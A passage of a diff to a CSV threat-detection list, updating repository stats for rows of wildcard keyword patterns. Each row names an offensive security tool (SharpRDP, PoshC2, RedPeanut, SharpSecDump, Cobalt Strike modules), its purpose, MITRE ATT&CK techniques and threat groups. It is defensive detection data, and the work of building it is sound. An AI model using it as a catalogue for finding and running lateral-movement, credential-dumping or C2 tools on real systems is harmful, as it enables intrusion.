- T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpNoPSExec.csproj*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" -"*SharpNoPSExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNoPSExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpNoPSExec.exe*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec.sln*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec-master*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpPack*","offensive_tool_keyword","SharpPack","SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.","T1218.010 - T1218.011 - T1059 - T1127 - T1055","TA0002 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/mdsecactivebreach/SharpPack","1","0","N/A","N/A","2","145","34","2018-12-17T11:55:12Z","2018-12-17T10:51:19Z" -"*SharpPrinter.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpPrinter.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpPrintNightmare*","offensive_tool_keyword","SharpPrintNightmare","C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527","T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Exploitation tools","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","1736","587","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z" -"*sharpps $psversiontable*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*sharpps get-process*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpps $psversiontable*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpps get-process*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*sharppsexec*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpPsExecManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpPsExecService.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpRDP.*.dll.bin*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*SharpRDP.csproj*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*SharpRDP.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpRDP.exe*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*SharpRDP.sln*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.*.dll.bin*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.csproj*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpRDP.exe*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.sln*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDPHijack.cs*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDPHijack.exe*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDPHijack-master*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" -"*SharpRDP-master*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP-master*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*Sharpreflect *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*SharpReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpRoast.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","855","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" -"*sharpsc *cmd*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpRoast.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*sharpsc *cmd*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SharpSCCM*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"*SharpSCCM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSCCM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpSCShell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*SharpSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpSecDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSecDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*sharpsecretsdump*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" -"*SharpShares.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpShellPipe.exe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" -"*SharpShellPipe.sln*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" -"*SharpShellPipe-main*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" -"*SharpShooter*","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1564 - T1204 - T1059 - T1105","TA0002 - TA0011 - 